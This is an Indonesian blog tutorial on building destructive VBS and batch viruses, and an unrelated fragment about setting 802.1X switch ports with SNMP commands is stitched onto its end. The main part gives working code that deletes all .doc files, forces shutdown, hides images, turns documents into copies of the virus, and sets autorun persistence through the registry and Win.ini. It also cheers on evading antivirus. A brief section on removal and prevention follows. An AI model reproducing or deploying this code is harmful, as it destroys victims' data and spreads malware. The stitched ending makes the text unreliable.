Hi kita ketemu lagi untuk melakukan misi gila kita :D dan seperti janji saya sekarang kita akan membahas file *.bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kode berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih “All File” dalam kolom “Save As Type” lalu jalankan!! setelah itu apa yang terjadi?? yah tanggal berubah jadi juli-7-2007.
Nah jika dihubungkan dengan perintah vbs di artikel sebelumnya yang akan menyebarkan flashdisk pada tahun 2008 anda bisa buat file *.bat tadi untuk merubah waktu menjadi 2008 sehingga virus tersebut akan selalu menyebar ke drive dan tidak bisa mati :D walaupun tidak perlu juga tidak apa-apa!! karena virus kita bisa menyebar pada detik ke-1 yang akan selalu ada selama 1 menit sekali.ngomong apaan sih?? wah berarti anda belum baca atau mengerti artikel sebelumnya!! saya anjurkan anda baca yang sebelumnya!! di save!! copy paste ke word juga boleh :D oke lanjut ke file *.bat kita tidak mungkin membuat banyak file *.bat karena selain akan cepat terdeteksi, kita juga akan semakin rumit merubah registry!! namun jangan kuatir karena file *.bat bisa menjalankan perintah DOS/COMMAND_PROMPT secara langsung. dan untuk memahami perintahnya anda bisa Download disini!!
Jika anda tidak puas dengan tutorial yang barusan anda download maka saya akan bahas beberapa perintah yang cocok untuk virus kita :D berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C:\*.doc ‘—– hapus semua file berextensi doc di drive c
Shutdown -s -f -t 30 -c “Selamat Tidur” ‘—– -s = shutdown computer, -f = tutup semua aplikasi tanpa peringatan, -t = setting waktu(dalam detik) -c = menampilkan pesan “Selamat Tidur” (Bebas kita ubah)
attrib +s +h C:\*.jpg /s /d ‘—– beri attribut hidden dan system semua file jpg
for /R c:\ %%r in (*.cob *.doc) do copy %0 “%%r” ‘—– Copy isi file *.bat ke semua file *.cob dan *.doc di C
for /R c:\ %%r in (*.cob *.doc) do ren “%%r” *.bat ‘—– Rename semua file *.cob dan *.doc jadi *.bat sehingga isi file jd virus kita :D haha..haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling cocok!! mungkin menghapus, shutdown dalam 30 detik, menyembunyikan atau merubah isinya jadi file *.bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kode berikut ini:
Set bath = fso.CreateObject(towind & “\sialan.bat”)
bath.writeline “del C:\*.doc”
bath.writeline “Shutdown -s -f -t 30″
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do copy %0 %%r”
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do ren %%r *.bat”
bath.close
‘bonus
wsh.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\”SysError”, “towind & “\sialan.bat”, “REG_SZ”
Maka ketika windows diaktifkan semua file doc akan menjadi *.bat dengan isi kode penghancur kita :D bisa diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kode tersebut akan di blok karena jelas-jelas untuk merusak!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali :D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita bisa membuat file lain seperti *.html atau *.ini!! jika kita punya banyak duplikat virus kita bisa membuat file *.ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah file ini di windows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile(”C:\WINDOWS\Win.ini”)
BuatIni.writeline “[WINDOWS]”
BuatIni.writeline “run = C:\Ju_Pe.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.writeline “load = C:\Persik.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah dirubah.
Fuih akhirnya beres juga yah tutorial membuat virus kita :D anda bisa gabungkan perintah-perintah sebelumnya bahkan memodifikasi tapi!! jika dipakai merusak anda yang tanggung jawab :D
Dari pembahasan kita maka kita bisa simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda bisa melihat dan membunuh semua virus dan membenarkan registry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda bisa menggunakan tool pengganti TaskManager yang biasanya akan di blok.
2.Hapus semua duplikat virus!! anda bisa gunakan antivirus update terbaru dan jika diblok virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe
3.Buka registry dan periksa dengan teliti semua subkey run otomatis biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa file win.ini!! jika dirubah anda minta dari komputer teman anda :D dan jika ada petunjuk letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!

Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika bisa yang mempunyai fitur heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
“HKCU(atau HKLM)\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”, buat DWORD value baru dengan nama NoDriveTypeAutorun dan isi dengan nilai 255. atau melalui start—Run—ketik GPEDIT.msc—User Configuration—Administratif Templates—–System—–Cari Turn Off AutoPlay—–klik 2x dan rubah jadi Enabled!!
5.Jangan Pakai OS Windows, pake linux cos VMaker Indonesia cuma bisa bikin untuk windows :D Peace!!
Nah dengan mengerti cara pembuatan tentunya kita juga jadi tahu cara menanggulanginya. maka tidak aneh ada dugaan kalau pembuat virus dan antivirus Join :D sebagai penutup!! saya bisa berkata bahwa virus vbs adalah virus tingkat rendah karena dibuat dengan kode yang sederhana menggunakan notepad walau tetap saja sulit bagi yang awam!! sesungguhnya masih banyak teknik membuat virus vbs yang lebih gila daripada ini termasuk yang sekarang banyak beredar dan itu tugas anda untuk terus belajar dan mengembangkan. lain kali jika saya punya waktu kita bahas pembuatan virus *bat enkripsi dan kalau anda mau yang menggunakan visual basic juga boleh :D supaya anda lebih mengerti kalau untuk menciptakan virus sehebat Flu-burung, Windx-Matrox atau RontokBrow itu tidak sesulit yang dibayangkan.
oke jika yang sederhana ini anda sudah mengerti anda boleh contact saya dan kita akan bahas yang 1 tahap lebih sulit!!

Tutorial Sebelumnya

G:\usr\bin>snmpget.exe -OnqU -v 2c -c public@100 192.168.36.11 .1.3.6.1.2.1.17.1.4.1.2.108
.1.3.6.1.2.1.17.1.4.1.2.108 11002

The interface index returned is 11002, and once again we can extract it from the output using a
regular expression as shown in the getIFIndex() function in listing 1.

Setting Dot1x port control
To allow the computer to connect to the network without a supplicant, the port is first placed into
forced authorised mode. The interface index is concatenated to
dot1xAuthAuthControlledPortControl and an snmp set operation is used with an integer
argument of 3 (FORCEAUTHORISED). The same process can be used to return the switch port
to normal operation by specifying an argument of 2 (AUTO). This operation is performed by the
setPortControl() function in listing 2.

G:\usr\bin>snmpset.exe -v 2c -c private 192.168.36.11 .1.0.8802.1.1.1.1.2.1.1.6.1